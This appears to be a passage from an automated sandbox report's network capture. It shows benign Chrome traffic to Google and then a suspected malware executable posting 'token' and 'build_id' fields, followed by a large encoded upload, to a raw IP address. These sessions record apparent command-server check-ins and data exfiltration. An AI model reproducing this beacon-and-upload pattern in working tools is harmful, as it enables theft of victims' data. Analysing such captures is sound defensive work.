2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b Data Ascii: alue;return a};la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 73 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 73 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 75 61 3b 61 3a 7b 76 61 72 20 77 61 3d 7b 61 3a 21 30 7d 2c 78 61 3d 7b 7d 3b 74 72 79 7b 78 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 77 61 3b 75 61 3d 78 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 75 61 3d 21 31 7d 73 61 3d 75 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},sa;if(typeof Object.setPrototypeOf=="function")sa=Object.setPrototypeOf;else{var ua;a:{var wa={a:!0},xa={};try{xa.__proto__=wa;ua=xa.a;break a}catch(a){}ua=!1}sa=ua?function(a,b){a.__proto__=b;if(
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 64 28 68 2c 30 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 38 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 44 66 26 26 74 68 69 73 2e 44 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 44 66 3b 74 68 69 73 2e 44 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 62 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 44 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 62 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 71 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 Data Ascii: function(h){d(h,0)};b.prototype.k8=function(){for(;this.Df&&this.Df.length;){var h=this.Df;this.Df=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.bq(m)}}}this.Df=null};b.prototype.bq=function(h){this.qP(function(){throw h;})};v
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 21 30 3b 74 79 70 65 6f 66 20 68 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6e 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 Data Ascii: efined")return!0;typeof h==="function"?h=new h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.na.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 75 65 29 2e 71 79 28 70 28 71 2e 6c 65 6e 67 74 68 2d 0a 31 29 2c 6e 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6c 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 47 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 Data Ascii: ue).qy(p(q.length-1),n),l=k.next();while(!l.done)})};return e});var Ga=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 61 74 63 68 28 70 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 0a 76 61 72 20 66 3d 22 24 6a 73 63 6f 6d 70 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 45 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 41 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b Data Ascii: atch(p){return!1}}())return a;var f="$jscomp_hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Ea=(h+=Math.random()+1).toString();if(l){l=_.Aa(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 75 65 3a 6c 7d 2c 6d 2e 6c 69 73 74 2e 70 75 73 68 28 6d 2e 5a 65 29 2c 74 68 69 73 5b 31 5d 2e 4d 6b 2e 6e 65 78 74 3d 6d 2e 5a 65 2c 74 68 69 73 5b 31 5d 2e 4d 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 4d 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 4d 6b 3d 0a 6b 2e 5a 65 2e 4d Data Ascii: ue:l},m.list.push(m.Ze),this[1].Mk.next=m.Ze,this[1].Mk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Mk.next=k.Ze.next,k.Ze.next.Mk=k.Ze.M
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 7d 2c 68 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 6f 61 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 41 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d Data Ascii: },h=0;return c});oa("Set",function(a){if(function(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.Aa([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=
2025-03-15 07:29:36 UTC	1390	IN	Data Raw: 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 65 7d 3b 6f 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6f 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6f 61 28 22 53 Data Ascii: erator]=function(){return e};return e};oa("Array.prototype.entries",function(a){return a?a:function(){return Na(this,function(b,c){return[b,c]})}});oa("Array.prototype.keys",function(a){return a?a:function(){return Na(this,function(b){return b})}});oa("S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49761	142.250.185.206	443	7432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:37 UTC	747	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 914 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded;charset=UTF-8 sec-ch-ua-mobile: ?0 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-15 07:29:37 UTC	914	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 33 34 22 5d 2c 5b 22 4e 6f 74 3a 41 2d 42 72 61 6e 64 22 2c 22 32 34 22 5d 2c 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 33 34 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 33 34 2e 30 2e 36 39 39 38 2e 33 36 22 5d 2c 5b 31 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 34 32 30 32 33 37 37 34 33 35 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Chromium","134"],["Not:A-Brand","24"],["Google Chrome","134"]],0,"Windows","10.0.0","x86","","134.0.6998.36"],[1,0]]],373,[["1742023774353",null,null,null,null,n
2025-03-15 07:29:37 UTC	950	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=522=fXATUmWS2Mbk_AQFkajZU1ibAGabZe6Qs2xjxTz-o8Mj38FVPHXRj9h-cvxpWp7EBamZQAiSAlsBSdGV-Z1zI6675E4dPxoDOoLuNFidRnxClAWj_8hdas2MBjSZzAX4dh33NystA45yuGoCnV-3kT2-xQjMoHESXAjWq77l1f_ln4oE0BshtIaGX26rzPgu; expires=Sun, 14-Sep-2025 07:29:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Sat, 15 Mar 2025 07:29:37 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Sat, 15 Mar 2025 07:29:37 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2025-03-15 07:29:37 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2025-03-15 07:29:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:37 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----mophlxlng4o8qiwt2noz Host: 95.217.30.53 Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:37 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6d 6f 70 68 6c 78 6c 6e 67 34 6f 38 71 69 77 74 32 6e 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 6d 6f 70 68 6c 78 6c 6e 67 34 6f 38 71 69 77 74 32 6e 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 6d 6f 70 68 6c 78 6c 6e 67 34 6f 38 71 69 77 74 32 6e 6f 7a 0d 0a 43 6f 6e 74 Data Ascii: ------mophlxlng4o8qiwt2nozContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------mophlxlng4o8qiwt2nozContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------mophlxlng4o8qiwt2nozCont
2025-03-15 07:29:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49766	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:39 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4wbi5xt2689zmyc26ppp Host: 95.217.30.53 Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:39 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 77 62 69 35 78 74 32 36 38 39 7a 6d 79 63 32 36 70 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 34 77 62 69 35 78 74 32 36 38 39 7a 6d 79 63 32 36 70 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 34 77 62 69 35 78 74 32 36 38 39 7a 6d 79 63 32 36 70 70 70 0d 0a 43 6f 6e 74 Data Ascii: ------4wbi5xt2689zmyc26pppContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------4wbi5xt2689zmyc26pppContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------4wbi5xt2689zmyc26pppCont
2025-03-15 07:29:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49767	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:40 UTC	182	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8glx4o8qq1dje3ec2n7q Host: 95.217.30.53 Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:40 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 71 0d 0a 43 6f 6e 74 Data Ascii: ------8glx4o8qq1dje3ec2n7qContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------8glx4o8qq1dje3ec2n7qContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------8glx4o8qq1dje3ec2n7qCont
2025-03-15 07:29:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 